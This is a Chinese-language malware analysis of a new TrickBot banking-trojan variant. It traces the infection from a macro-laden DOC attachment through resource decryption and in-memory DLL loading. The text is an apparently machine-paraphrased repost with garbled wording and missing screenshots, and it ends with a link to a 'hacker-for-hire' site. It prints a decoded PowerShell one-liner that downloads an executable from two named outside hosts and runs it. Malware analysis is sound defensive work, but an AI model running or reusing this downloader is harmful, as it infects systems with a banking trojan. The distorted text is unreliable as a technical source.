一、布景
最近国外安全研究人员发现TrickBot银行木马最新的样本，深服气EDR安全团队对此事进行了相关跟进，获取到了相应的样本，并对样本进行了详细剖析，承认此样本为TrickBot银行盗号木马的最新变种样本，而且此样本十分活泼，最近一段时间更新十分频频。
TrickBot银行木马是一款专门针对各国银行进行进犯的歹意样本，它之前被黑客团伙用于进犯全球多个国家的金融机构，主要是经过垃圾邮件的方法进行进犯，此次发现的样本会对全球数百家大型银行网站进行进犯，部分银行列表如下：

二、样本运转流程

三、样本剖析
邮件附件DOC样本(重命名为Trickbot.doc)，如下所示：

打开文档之后，如下所示：

剖析DOC文件档，发现里边包括VBA宏代码，如下所示：

经过VBA宏编辑器解析DOC文档中的宏代码，如下所示：

动态调试解密里边的宏代码，经过CMD /C履行如下PowerShell脚本：
powershell “function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],’%temp%[随机名].exe’);
start-process ‘%temp%[随机名].exe’;}
try{[随机名](‘http://whitakerfamily.info/ico.ico‘)}catch{[随机名](‘http://rayanat.com/ico.ico‘)}
经过powershell脚本下载相应的TrickBot歹意程序，并履行。
TrickBot母体程序(随机名重命名为TrickBot.exe)，如下所示：

1.读取样本相应的资源数据到内存中，如下所示：

资源的ID:BBVCXZIIUHGSWQ，资源数据如下所示：

2.创立窗口，发送音讯，如下所示：

3.对获取到的资源数据进行加解密相关操作，如下所示：

从程序中导入密钥1，如下所示：

从程序中导入密钥2，如下所示：

最终经过CryptEncrypt对数据进行操作，如下所示：

履行之后，在内存中将资源数据复原为一个Payload的数据，如下所示：

4.然后在内存加载复原出来的payload数据，如下所示：

5.复原出来的payload其实是一个DLL，内存加载DLL，如下所示：

定位到DLL的进口点:10001900处，如下所示：

6.判别DLL的进口函数是否为shellcode_main，如下所示：

[1] [2] [3] [4]  黑客接单网